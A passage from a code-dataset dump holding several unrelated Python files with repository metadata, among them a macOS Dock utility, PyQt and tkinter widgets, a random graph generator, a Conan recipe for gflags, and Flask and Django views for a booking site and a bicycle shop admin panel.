'utf-8')\n add_path = utils.unicodify(add_path, enc)\n\n # set a dock label if one isn't provided\n if label_name is None:\n if tile_type == 'url-tile':\n label_name = add_path\n section = 'persistent-others'\n else:\n base_name = re.sub('/$', '', add_path).split('/')[-1]\n label_name = re.sub('.app$', '', base_name)\n\n\n # only add if item label isn't already there\n\n if replace_label != label_name:\n for existing_dock_item in (pl[section]):\n for label_key in ['file-label','label']:\n if label_key in existing_dock_item['tile-data']:\n if existing_dock_item['tile-data'][label_key] == label_name:\n print(\"%s already exists in dock. Use --replacing '%s' to update an existing item\" % (label_name, label_name))\n return False\n\n\n\n if replace_label is not None:\n for item_offset in range(len(pl[section])):\n tile_replace_candidate = pl[section][item_offset]['tile-data']\n if tile_replace_candidate[label_key_for_tile(tile_replace_candidate)] == replace_label:\n verboseOutput('found', replace_label)\n del pl[section][item_offset]\n position = item_offset + 1\n break\n\n new_guid = generate_guid()\n if tile_type == 'file-tile':\n new_item = {'GUID': new_guid, 'tile-data': {'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0},'file-label': label_name, 'file-type': 32}, 'tile-type': tile_type}\n elif tile_type == 'directory-tile':\n if subprocess.Popen(['/usr/bin/sw_vers', '-productVersion'],\n stdout=subprocess.PIPE).stdout.read().rstrip().split('.')[1] == '4': # gets the decimal after 10 in sw_vers; 10.4 does not use 10.5 options for stacks\n new_item = {'GUID': new_guid, 'tile-data': {'directory': 1, 'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0}, 'file-label': label_name, 'file-type': 2 }, 'tile-type': tile_type}\n else:\n new_item = {'GUID': new_guid, 'tile-data': {'arrangement': arrangement, 'directory': 1, 'display_as': display_as, 'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0}, 'file-label': label_name, 'file-type': 2, 'show_as': show_as}, 'tile-type': tile_type}\n\n elif tile_type == 'url-tile':\n new_item = {'GUID': new_guid, 'tile-data': {'label': label_name, 'url': {'_CFURLString': add_path, '_CFURLStringType': 15}}, 'tile-type': tile_type}\n else:\n print('unknown type:', tile_type)\n return False\n\n verboseOutput('adding', new_item)\n\n if position is not None:\n if position in [ 'beginning', 'begin', 'first' ]:\n pl[section].insert(0, new_item)\n return True\n elif position in [ 'end', 'last' ]:\n pl[section].append(new_item)\n return True\n elif position in [ 'middle', 'center' ]:\n midpoint = int(len(pl[section])/2)\n pl[section].insert(midpoint, new_item)\n return True\n else:\n try:\n int(position)\n except Exception:\n print('Invalid position', position)\n return False\n if int(position) == 0:\n pl[section].insert(int(position), new_item)\n elif int(position) > 0:\n pl[section].insert(int(position)-1, new_item)\n else:\n pl[section].insert(int(position)+len(pl[section])+1, new_item)\n return True\n elif after_item is not None or before_item is not None:\n for item_offset in range(len(pl[section])):\n try:\n if after_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == after_item:\n pl[section].insert(item_offset+1, new_item)\n return True\n if before_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == before_item:\n pl[section].insert(item_offset, new_item)\n return True\n except KeyError:\n pass\n pl[section].append(new_item)\n verboseOutput('item added at end')\n return True\n\n\ndef removeItem(pl, item_name):\n removal_succeeded = False\n if item_name == \"all\":\n verboseOutput('Removing all items')\n pl['persistent-apps'] = []\n pl['persistent-others'] = []\n return True\n for dock_item in pl['persistent-apps']:\n if dock_item['tile-data'].get('file-label') == item_name:\n verboseOutput('found', item_name)\n pl['persistent-apps'].remove(dock_item)\n removal_succeeded = True\n for dock_item in pl['persistent-others']:\n if dock_item['tile-type'] == \"url-tile\":\n if dock_item['tile-data'].get('label') == item_name:\n verboseOutput('found', item_name)\n pl['persistent-others'].remove(dock_item)\n removal_succeeded = True\n else:\n if dock_item['tile-data'].get('file-label') == item_name:\n verboseOutput('found', item_name)\n pl['persistent-others'].remove(dock_item)\n removal_succeeded = True\n return removal_succeeded\n\n\ndef restart_the_dock():\n os.system('/usr/bin/killall -HUP Dock >/dev/null 2>&1')\n\n\ndef commitPlist(pl, plist_path, restart_dock):\n writePlist(pl, plist_path)\n if restart_dock:\n restart_the_dock()\n#def commitPlistLegacy(pl, plist_path, restart_dock):\n# plist_string_path = path_as_string(plist_path)\n# pl = removeLongs(pl)\n# plist_stat = os.stat(plist_string_path)\n# writePlist(pl, plist_path)\n# convertPlist(plist_path, 'binary1')\n# os.chown(plist_string_path, plist_stat.st_uid, plist_stat.st_gid)\n# os.chmod(plist_string_path, plist_stat.st_mode)\n# if restart_dock:\n# os.system('/usr/bin/killall -HUP cfprefsd >/dev/null 2>&1')\n# os.system('/usr/bin/killall -HUP Dock >/dev/null 2>&1')\n#\n\n\ndef label_key_for_tile(item):\n for label_key in ['file-label','label']:\n if label_key in item:\n return label_key\n\n\ndef main():\n retVal = dock_util(sys.argv[1:])\n sys.exit(retVal)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wavesaudio/instl","sub_path":"utils/dockutil.py","file_name":"dockutil.py","file_ext":"py","file_size_in_byte":29720,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"9302734826","text":"import random\n\nclass Levers():\n\tdef __init__(self, n) -> None:\n\t\tself.levers = []\n\t\tself.picks = []\n\t\tfor _ in range(0, n):\n\t\t\tself.levers.append(random.uniform(0, 1))\n\t\t\tself.picks.append(0)\n\t\tself.n = n\n\n\tdef get_levers(self):\n\t\treturn self.levers\n\t\n\tdef pick_lever(self, choice):\n\t\tnew_random_number = random.uniform(0, 1)\n\t\tif new_random_number <= self.levers[choice]:\n\t\t\treturn 1\n\t\treturn 0\n","repo_name":"dorinm17/connect_four_statistics","sub_path":"part3/levers.py","file_name":"levers.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22781157428","text":"import os\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QFont, QColor\nfrom PyQt5.QtWidgets import QWidget, QLabel, QHBoxLayout, QFrame, QVBoxLayout\n\nfrom PhotoViewer import PhotoViewer\nfrom models import Teacher\n\n\nclass TeacherInfoWidget(QWidget):\n def __init__(self, teacher: Teacher, size, parent=None):\n super().__init__(parent)\n self.__size = size\n\n self.photo_viewer = PhotoViewer(os.path.join('teacher_info', teacher.photo_path), size)\n\n vlayout = QVBoxLayout()\n\n self.name = QLabel('' + teacher.name + '')\n self.name.setFont(QFont('Ubuntu Mono', size * 0.11))\n self.name.setAlignment(QtCore.Qt.AlignCenter)\n vlayout.addWidget(self.name)\n vlayout.addSpacerItem(\n QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n layout = QHBoxLayout()\n\n layout.addSpacerItem(\n QtWidgets.QSpacerItem(40, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n layout.addWidget(self.photo_viewer)\n layout.addSpacerItem(\n QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n layout.addLayout(self._get_info_layout(teacher, size))\n layout.addSpacerItem(\n QtWidgets.QSpacerItem(40, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n vlayout.addLayout(layout)\n\n vlayout.addSpacerItem(\n QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n p = self.palette()\n p.setColor(self.backgroundRole(), QColor(250, 205, 140))\n\n self.setPalette(p)\n\n container = QWidget(self)\n container.setLayout(vlayout)\n\n frame = QFrame(container)\n frame.setStyleSheet(\"border-style: outset; border-width: 6px; border-radius: 10px; border-color: #732125;\")\n\n container.show()\n frame.setFixedSize(container.size())\n\n def _get_info_layout(self, teacher: Teacher, size):\n self.facts_viewer = QLabel(teacher.fact)\n self.facts_viewer.setWordWrap(True)\n self.facts_viewer.setFont(QFont('Ubuntu Mono', size * 0.06))\n self.facts_viewer.setAlignment(QtCore.Qt.AlignCenter)\n\n self.subjects_viewer = QLabel('Предметы:
' + \"
\".join(teacher.subjects))\n self.subjects_viewer.setFont(QFont('Ubuntu Mono', size * 0.06))\n self.subjects_viewer.setAlignment(QtCore.Qt.AlignCenter)\n\n layout = QVBoxLayout()\n\n layout.addWidget(self.facts_viewer)\n layout.addWidget(self.subjects_viewer)\n\n return layout\n\n","repo_name":"rkhapov/pk","sub_path":"TeacherInfoWidget.py","file_name":"TeacherInfoWidget.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35891047322","text":"from PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\n\nfrom .button import PictureButtonFlat\n\n\nclass NotepadDashboardToolbar(QtWidgets.QFrame):\n newNoteAction = QtCore.pyqtSignal(object)\n importNoteAction = QtCore.pyqtSignal(object)\n newGroupAction = QtCore.pyqtSignal(object)\n\n def __init__(self):\n super(NotepadDashboardToolbar, self).__init__()\n\n self.setLayout(QtWidgets.QHBoxLayout())\n self.layout().setContentsMargins(0, 0, 0, 0)\n self.layout().setAlignment(Qt.AlignCenter)\n\n self.note = PictureButtonFlat(QtGui.QIcon(\"icons/note\"))\n self.note.clicked.connect(self.newNoteAction.emit)\n self.note.setText(' New Note')\n self.layout().addWidget(self.note)\n\n self.group = PictureButtonFlat(QtGui.QIcon(\"icons/book\"))\n self.group.clicked.connect(self.newGroupAction.emit)\n self.group.setText(' New Group')\n self.layout().addWidget(self.group)\n\n self.importing = PictureButtonFlat(QtGui.QIcon(\"icons/import\"))\n self.importing.clicked.connect(self.importNoteAction.emit)\n self.importing.setText(' Import Note')\n self.layout().addWidget(self.importing)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+n\"), self.note)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.newNoteAction.emit(self.note))\n shortcut.activated.connect(lambda x=None: self.newNoteAction.emit(self.note))\n shortcut.setEnabled(True)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+g\"), self.group)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.newGroupAction.emit(self.group))\n shortcut.activated.connect(lambda x=None: self.newGroupAction.emit(self.group))\n shortcut.setEnabled(True)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+i\"), self.importing)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.importNoteAction.emit(self.importing))\n shortcut.activated.connect(lambda x=None: self.importNoteAction.emit(self.importing))\n shortcut.setEnabled(True)\n\n self.progress = QtWidgets.QProgressBar(self)\n self.progress.setVisible(False)\n self.layout().addWidget(self.progress)\n\n def setProgress(self, value=None):\n if value in [None, 0, 100]:\n self.progress.setVisible(False)\n self.note.setVisible(True)\n self.importing.setVisible(True)\n self.group.setVisible(True)\n return self\n\n self.progress.setVisible(True)\n self.progress.setValue(value)\n self.note.setVisible(False)\n self.importing.setVisible(False)\n self.group.setVisible(False)\n return self\n\n def close(self):\n super(NotepadDashboardToolbar, self).deleteLater()\n return super(NotepadDashboardToolbar, self).close()\n","repo_name":"AlexWoroschilow/AOD-Notes","sub_path":"src/modules/window_notepad_dashboard/gui/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26925828658","text":"import math\nimport numpy\nimport random\n\n\nclass GenGraphException(Exception):\n pass\n\n\ndef _calc_fill_pos(nodes, idx):\n total_cnt = (nodes/2) * (nodes-1)\n if idx >= total_cnt:\n raise GenGraphException(\"Index out of node count\")\n d2 = math.floor((-1 + math.sqrt(1 + 8 * idx)) / 2)\n return int(idx - (d2+1)/2*d2), d2+1\n\n\ndef _rand_connect(edges, adj_mat, directed=False):\n if adj_mat.ndim != 2 or adj_mat.shape[0] != adj_mat.shape[1]:\n raise GenGraphException(\"Invalid adj_mat shape\")\n\n nodes = adj_mat.shape[0]\n all_possible_edges_cnt = int(nodes * (nodes-1))\n if not directed:\n undirected_possible_edges_cnt = all_possible_edges_cnt\n else:\n undirected_possible_edges_cnt = all_possible_edges_cnt // 2\n print(\"Matrix shape: %s\" % (adj_mat.shape,))\n print(\"Asking for %d random edges; Maximum possible edges: %d\" % (edges, all_possible_edges_cnt))\n edges = min(all_possible_edges_cnt, edges)\n fill_indices = random.sample(range(all_possible_edges_cnt), edges)\n for connection in fill_indices:\n if directed:\n if connection >= undirected_possible_edges_cnt:\n connection = connection-undirected_possible_edges_cnt\n d2, d1 = _calc_fill_pos(nodes, connection)\n else:\n d1, d2 = _calc_fill_pos(nodes, connection)\n adj_mat[d1][d2] = 1\n else:\n d1, d2 = _calc_fill_pos(nodes, connection)\n adj_mat[d1][d2] = 1\n adj_mat[d2][d1] = 1\n print(\"Result: \\n%s\" % adj_mat)\n return adj_mat\n\n\ndef gen_graph(nrange, erange, directed=True):\n nodes = random.randint(nrange[0], nrange[1])\n edges = random.randint(erange[0], erange[1])\n adj_mat = numpy.zeros((nodes, nodes), dtype=numpy.int8)\n _rand_connect(edges, adj_mat, directed=directed)\n return (nodes, adj_mat)\n","repo_name":"y-usuzumi/tf-explore","sub_path":"random_adjacency_matrix/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"573647278","text":"import json\nfrom flask import render_template, redirect, url_for, abort, flash, request\nfrom flask_login import login_required, current_user\nfrom . import main\nfrom .forms import NameForm, EditProfileForm, EditProfileAdminForm\nfrom .. import db\nfrom ..models import Role, User, ReserveInfo\nfrom ..decorators import admin_required\n\n\n@main.route('/')\n@login_required\ndef index():\n return render_template('index.html')\n\n# 获取预约数据\n@main.route('/main/total_data', methods=[\"GET\", \"POST\"])\n@login_required\ndef total_data():\n rows = [{\n 'date': '2018-08-30',\n '08:30--09:30':'北海市工业园区管委会',\n '09:30--10:30':'市委组织部',\n '10:30--11:30':'市委办公室',\n '14:30--15:30':'涉密载体销毁中心',\n '15:30--16:30':'北海市国家保密局',\n '16:30--17:30':'市纪委',\n }]\n result = json.dumps(rows)\n return result\n\n# 根据预约信息ID判断是否可以获取预约信息\n@main.route('/main/get_reserve_info_flag_by_id', methods=[\"GET\", \"POST\"])\n@login_required\ndef get_reserve_info_flag_by_id():\n data_dict = request.get_json() # 获取前台的数据(json格式)\n rows = {'flag': 'fail'} # flag标记是否可以获取详细信息,默认fail(不可以)\n\n print('------------------------------------------')\n print(data_dict)\n print('------------------------------------------')\n\n if current_user.is_moderator() or current_user.is_administrator(): # 管理员和协管用户可以\n rows['flag'] = 'success'\n else:\n reserve_info = ReserveInfo.query.get_or_404(int(data_dict['reserve_id']))\n print('------------------------------------------')\n print(data_dict)\n print(reserve_info.user_id)\n print(current_user.id)\n print('------------------------------------------')\n if reserve_info.user_id == current_user.id: # 如果当前用户与预约用户是同一用户\n rows['flag'] = 'success'\n \n result = json.dumps(rows)\n return result\n\n# 根据预约信息ID判断是否可以获取预约信息\n@main.route('/main/get_reserve_info_by_id/')\n@login_required\ndef get_reserve_info_by_id(reserve_id):\n reserve_info = ReserveInfo.query.get_or_404(reserve_id)\n return render_template(\"main/reserve_info.html\", reserve_info=reserve_info)\n\n\n# 资料页面路由\n@main.route('/user/')\n@login_required\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n return render_template('main/user.html', user=user)\n\n# 普通用户和协管员修改账号信息\n@main.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.department = form.department.data\n current_user.location = form.location.data\n current_user.remarks = form.remarks.data\n db.session.add(current_user._get_current_object()) # 通过_get_current_object()获取User对象\n db.session.commit()\n flash('您的账号信息已经更新!')\n return redirect(url_for('.user', username=current_user.username))\n form.department.data = current_user.department\n form.location.data = current_user.location\n form.remarks.data = current_user.remarks\n return render_template('main/edit_profile.html', form=form)\n\n# 管理员修改账号信息\n@main.route('/edit_profile/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.department = form.department.data\n user.location = form.location.data\n user.remarks = form.remarks.data\n db.session.add(user)\n db.session.commit()\n flash('您的账号信息已经更新!')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.department.data = user.department\n form.location.data = user.location\n form.remarks.data = user.remarks\n return render_template('main/edit_profile.html', form=form, user=user)","repo_name":"YaJunCui/bhbmjsfwzx","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26343935928","text":"import tkinter as tk\nfrom muvimaker import main_logger\nfrom .sound_files_frame import SoundFilesFrame\nfrom .picture_frame import PicturesFrame\n\n\nlogger = main_logger.getChild(__name__)\n\n\nclass InfoFrame(tk.Frame):\n\n def __init__(self, parent):\n tk.Frame.__init__(self, parent.master)\n self.parent = parent\n self.master = parent\n self.sound_files_frame = None\n self.pictures_frame = None\n self._setup_widgets()\n self.columnconfigure((0, 1), weight=1)\n self.rowconfigure(0, weight=1)\n\n def _setup_widgets(self):\n sound_files_frame = SoundFilesFrame(self)\n sound_files_frame.grid(row=0, column=0, sticky='nsew')\n self.sound_files_frame = sound_files_frame\n\n pictures_frame = PicturesFrame(self)\n pictures_frame.grid(row=0, column=1, sticky='nsew')\n self.pictures_frame = pictures_frame\n\n # audio_file_label = tk.Label(self, text='Sound File: ')\n # audio_file_label.grid(row=0, column=0)\n # audio_filename_label = tk.Label(self, textvariable=self.parent.soundfile)\n # audio_filename_label.grid(row=0, column=1)\n #\n # video_file_label = tk.Label(self, text='Video Output File: ')\n # video_file_label.grid(row=1, column=0)\n # video_filename_label = tk.Label(self, textvariable=self.parent.videofile)\n # video_filename_label.grid(row=1, column=1)","repo_name":"JannisNe/muvimaker","sub_path":"muvimaker/editor/frames/info_frame/info_frame.py","file_name":"info_frame.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31942216095","text":"from conan import ConanFile\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import collect_libs, copy, get, rmdir, save\nimport os\nimport textwrap\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass GflagsConan(ConanFile):\n name = \"gflags\"\n description = \"The gflags package contains a C++ library that implements commandline flags processing\"\n topics = (\"cli\", \"flags\", \"commandline\")\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/gflags/gflags\"\n license = \"BSD-3-Clause\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"nothreads\": [True, False],\n \"namespace\": [\"ANY\"],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"nothreads\": True,\n \"namespace\": \"gflags\",\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"BUILD_SHARED_LIBS\"] = self.options.shared\n tc.variables[\"BUILD_STATIC_LIBS\"] = not self.options.shared\n tc.variables[\"BUILD_gflags_LIB\"] = not self.options.nothreads\n tc.variables[\"BUILD_gflags_nothreads_LIB\"] = self.options.nothreads\n tc.variables[\"BUILD_PACKAGING\"] = False\n tc.variables[\"BUILD_TESTING\"] = False\n tc.variables[\"INSTALL_HEADERS\"] = True\n tc.variables[\"INSTALL_SHARED_LIBS\"] = self.options.shared\n tc.variables[\"INSTALL_STATIC_LIBS\"] = not self.options.shared\n tc.variables[\"REGISTER_BUILD_DIR\"] = False\n tc.variables[\"REGISTER_INSTALL_PREFIX\"] = False\n tc.variables[\"GFLAGS_NAMESPACE\"] = self.options.namespace\n tc.generate()\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"COPYING.txt\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"cmake\"))\n\n # TODO: to remove in conan v2 once legacy generators removed\n self._create_cmake_module_alias_targets(\n os.path.join(self.package_folder, self._module_file_rel_path),\n {\"gflags\": \"gflags::gflags\"}\n )\n\n def _create_cmake_module_alias_targets(self, module_file, targets):\n content = \"\"\n for alias, aliased in targets.items():\n content += textwrap.dedent(f\"\"\"\\\n if(TARGET {aliased} AND NOT TARGET {alias})\n add_library({alias} INTERFACE IMPORTED)\n set_property(TARGET {alias} PROPERTY INTERFACE_LINK_LIBRARIES {aliased})\n endif()\n \"\"\")\n save(self, module_file, content)\n\n @property\n def _module_file_rel_path(self):\n return os.path.join(\"lib\", \"cmake\", f\"conan-official-{self.name}-targets.cmake\")\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"gflags\")\n self.cpp_info.set_property(\"cmake_target_name\", \"gflags::gflags\")\n self.cpp_info.set_property(\"cmake_target_aliases\", [\"gflags\"])\n self.cpp_info.set_property(\"pkg_config_name\", \"gflags\")\n self.cpp_info.libs = collect_libs(self)\n if self.settings.os == \"Windows\":\n self.cpp_info.system_libs.extend([\"shlwapi\"])\n elif self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs.extend([\"pthread\", \"m\"])\n\n # TODO: to remove in conan v2 once legacy generators removed\n self.cpp_info.build_modules[\"cmake_find_package\"] = [self._module_file_rel_path]\n self.cpp_info.build_modules[\"cmake_find_package_multi\"] = [self._module_file_rel_path]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/gflags/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"2586937315","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.views.decorators.cache import never_cache\nfrom django.contrib.auth.decorators import login_required\nfrom home.models import CustomUser,product,product_category,product_description,product_image,user_order,discount_coupen,order_list\nfrom django.views import View\nfrom django.http.response import JsonResponse\nfrom django.core import serializers\nfrom datetime import date, timedelta\nfrom django.db.models import Sum, Count\nimport json\nfrom django.http import FileResponse, HttpResponse\n\n# for pdf generation\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import letter\nimport io\nimport csv\n\nfrom django.contrib.auth.decorators import user_passes_test\n\n# Create your views here.\n\n\ndef cycloneadmin_login(request):\n\n # check if the user is already logedin\n if request.user.is_authenticated:\n return redirect(\"dashboard\")\n\n # if the request is post fetch data\n if request.method == \"POST\":\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n user = authenticate(email = email,password = password)\n \n # check the user is a valied admin\n if user is not None and user.is_superuser:\n login(request,user)\n return redirect(\"dashboard\")\n else:\n messages.info(request,\"Admin user not found or incorrect password\")\n # if method is get\n return render(request,'cycloneadmin_login.html')\n\ndef cycloneadmin_logout(request):\n logout(request)\n return redirect(\"login\")\n\n\n\nclass cycloneadmin_dashboard(View):\n\n\n def get(self,request):\n user_count = CustomUser.objects.filter(is_superuser = False).count() \n sales_today = user_order.objects.filter(order_date = date.today()).count()\n total_shipment = user_order.objects.count()\n total_revenue = user_order.objects.all().aggregate(Sum(\"payment_amount\"))['payment_amount__sum']\n category_sales = order_list.objects.values('category_id__product_id__bike_type').annotate(Count('category_id__product_id__bike_type'))\n day_sale = order_list.objects.values('order_no__order_date').annotate(item_sum = Sum('order_quantity'))\n total_revenue_status = user_order.objects.values('order_date').annotate(date_total_revenue = Sum('payment_amount'))\n\n dashboard_data = {\"user_count\":user_count,\"sales_today\":sales_today,\"total_shipment\":total_shipment,\"total_revenue\":total_revenue,\"category_sales\":category_sales,\"day_sale\":day_sale,\"total_revenue_status\":total_revenue_status}\n \n \n return render(request,'cycloneadmin_dashboard.html',dashboard_data)\n\n\n\n# user information \ndef cycloneadmin_userinfo(request):\n return render(request,'cycloneadmin_userinfo.html',{\"data\":CustomUser.objects.filter(is_superuser=False)})\n\n\n# unbload or bloak user\nclass cycloneadmin_edituseracces(View):\n\n def post(self,request):\n email = request.POST['email']\n user = CustomUser.objects.get(email = email)\n if user.is_active:\n user.is_active = False\n else:\n user.is_active = True\n user.save()\n return JsonResponse({'status':'200','message':user.is_active})\n\n\ndef cycloneadmin_sellerinfo(request):\n return render(request,'cycloneadmin_sellerinfo.html')\n\n\n# products view\ndef cycloneadmin_products(request):\n \n # fetching info from data base\n products = product.objects.values(\"product_id\",\"company\",\"model\",\"bike_type\")\n\n return render(request,'cycloneadmin_products.html',{\"products\":products})\n\n\ndef cycloneadmin_category(request):\n # fetching data from database to list out categories\n # product and product_catogories are joined to fetch the data\n \n categories = product_category.objects.values(\"product_id__company\",\"product_id__model\",\"frame_size\",\"break_type\",\"color\",\"is_discontinued\",\"quantity\",\"id\")\n \n return render(request,'cycloneadmin_category.html',{\"categories\":categories})\n\n\n\ndef cycloneadmin_addcategory(request):\n \n if request.method == \"POST\":\n\n product_imgs = request.FILES.getlist('product_imgs[]')\n \n \n # find the record using this info\n company = request.POST['company']\n model = request.POST['model']\n\n # update record\n frame_size = request.POST['frame_size']\n color = request.POST['color']\n break_type = request.POST['break_type']\n gear_type = request.POST['gear_type']\n mrp = request.POST['mrp']\n seller_price = request.POST['seller_price']\n quantity = request.POST['quantity']\n is_discounted = request.POST['is_discounted']\n \n \n # update all the information , not a good practce\n # only update changed fields using ajax\n try: \n product_id = product.objects.get(model = model, company = company)\n new_category = product_category(product_id = product_id,frame_size = frame_size,color = color, break_type = break_type, gear_type = gear_type, mrp = mrp ,seller_price = seller_price, quantity = quantity, is_discounted = is_discounted) \n new_category.save() \n\n # iteratively update all pictures in data base from picture list\n for image in product_imgs:\n new_image = product_image(category_id = new_category, product_image = image) \n new_image.save()\n \n except product.DoesNotExist:\n messages.info(request,\"such product does not exist\")\n return redirect(\"addcategory\")\n \n messages.info(request,\"new category successfully added\") \n return redirect(\"addcategory\")\n\n products = product.objects.values('company','model')\n return render(request,'cycloneadmin_addcategory.html',{'products':products})\n\n\n\nclass cycloneadmin_editcategory(View):\n\n def get(self,request,category_id):\n\n productcat = product_category.objects.get(id = category_id)\n print(productcat.is_discounted)\n return render(request,'cycloneadmin_editcategory.html',{\"productcat\":productcat})\n\n def post(self,request,category_id):\n \n # fetch pictures from the backend\n current_imgs = request.FILES.getlist('current_imgs[]')\n \n # fetch other fields\n frame_size = request.POST['frame_size']\n color = request.POST['color']\n break_type = request.POST['break_type']\n gear_type = request.POST['gear_type']\n mrp = request.POST['mrp']\n seller_price = request.POST['seller_price']\n quantity = request.POST['quantity']\n is_discounted = request.POST['is_discounted']\n\n \n # update all the information , not a good practce\n # only update changed fields using ajax\n try:\n update_product = product_category.objects.get(id = category_id) \n \n update_product.frame_size = frame_size\n update_product.color = color\n update_product.break_type = break_type\n update_product.gear_type = gear_type\n update_product.mrp = mrp\n update_product.seller_price = seller_price\n update_product.quantity = quantity\n update_product.is_discounted = is_discounted\n \n update_product.save()\n # iteratively update all pictures in data base from picture list\n for image in current_imgs:\n new_image = product_image(category_id = update_product, product_image = image) \n new_image.save() \n messages.info(request,\"product updated successfully\")\n except Exception as e:\n print(e)\n messages.info(request,\"such product does not exist\")\n return redirect(\"addcategory\") \n \n return redirect(\"category\")\n\n\n# product continue / discontinue\nclass cycloneadmin_delete_category(View):\n\n def get(self, request):\n \n category_id = request.GET['category_id']\n\n # fetch product object\n discontinue_product = product_category.objects.get(id = category_id)\n \n # if product is available set to true / discontinue\n if discontinue_product.is_discontinued == False:\n discontinue_product.is_discontinued = True\n discontinue_product.save()\n return JsonResponse({'status':200,'message':'category discontinued'})\n # else set to false / continue\n else:\n discontinue_product.is_discontinued = False\n discontinue_product.save()\n return JsonResponse({'status':200,'message':'category back to available'})\n\n\n\ndef cycloneadmin_orders(request):\n\n orders = user_order.objects.values('order_no','email','order_date','payment_status','order_status')\n return render(request,'cycloneadmin_orders.html',{'orders':orders})\n\n\n\ndef cycloneadmin_reports(request):\n return render(request,'cycloneadmin_reports.html')\n\n\n\nclass cycloneadmin_addproduct(View):\n\n def get(self, request):\n return render(request,'cycloneadmin_addproduct.html')\n\n def post(self, request):\n\n # fetch data if the request is post\n if request.method == \"POST\":\n\n # for product table\n company = request.POST['company']\n model = request.POST['model']\n wheel_size = request.POST['wheel_size']\n suspention = request.POST['suspention']\n internal_cabling = request.POST['internal_cabling']\n bike_type = request.POST['bike_type']\n gender_cat = request.POST['gender_cat']\n\n # for product_description table\n terrain_description = request.POST['terrain_description']\n strength_description = request.POST['strength_description']\n perfomance_description = request.POST['perfomance_description']\n precision_description = request.POST['precision_description']\n \n # checking the product is already exist or not\n if product.objects.filter(company = company, model = model).exists():\n 